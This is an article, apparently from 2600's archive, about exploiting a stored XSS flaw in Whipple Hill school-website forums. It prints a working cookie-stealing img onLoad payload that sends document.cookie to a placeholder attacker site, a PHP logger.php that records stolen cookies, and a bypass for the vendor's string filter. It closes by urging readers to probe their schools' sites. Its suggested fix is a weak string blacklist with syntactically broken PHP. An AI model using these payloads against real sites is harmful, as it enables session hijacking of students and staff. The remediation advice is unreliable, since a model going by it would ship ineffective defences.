Hacking Whipple Hill with XSS

by Azohko

My school recently redid its website with a new and shiny user interface created by a company called Whipple Hill (whipplehill.com).

This new website enables you to check your schedule online and create groups which could also create their own forums.  After minutes of poking around, I found these group forums were vulnerable to an XSS exploit.

By redirecting the user to my website with a cookie stealer on it, you would be able to replace your cookies with theirs and become logged in as them.

This code would redirect the user to my website by loading an image:

<img src="linkToAnImage" onLoad='javascript:document.location="www.ChangeToYourSite.com/logger.php?" + document.cookie'>

The above code the passes the cookie information on to this script, which logs the data into log.txt:

logger.php:

<?php

function logData() {
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
  fputs($log, "COOKIE STOLEN! REF: $referer| DATE: $date | COOKIE: $cookie \n");
fclose($log);
}

logData();

?>

While simple at first (they didn't filter any HTML at all), when I called them they didn't seem to think it was a priority to fix it.

This was a major vulnerability among many of their websites and they never seemed to be in a hurry to fix it.  Finally, I got a message back responding to the exploit saying it was fixed.

Wrong.

Their amazing fix was to filter out the word document.cookie so the user couldn't steal cookies.

It took about two seconds to come up with a new code to exploit this:

<img src="linkToAnImage" onLoad='javascript:document.location="www.ChangeToYourSite.com/logger.php?" + docudocument.cookiement.cookie'>

The difference here is that when document.cookie is filtered out it still forms: document.cookie

This problem could easily have been fixed by using another method of checking for XSS in PHP.

Instead of searching and removing , they should have found every instance of document.cookie and replaced that with " script" with a space.

No harm could be done here, and this way people couldn't have harmless but annoying scripts running on the forums.

This could be done easily with the following PHP:

<?php
$searchFor = "document.cookie"
$replaceWith = " script"
$text = str_replace($searchFor , $replaceWith , $text);
?>

This new website my school bought cost them a lot and it amazes me that it would be vulnerable to something so simple.

Not only was the original exploit simple, but they failed to fix it successfully.  This is sad considering they are supposed to be professionals.  Check your school's websites for simple exploits.

You might get lucky like me.

Code: logger.php
Return to $2600 Index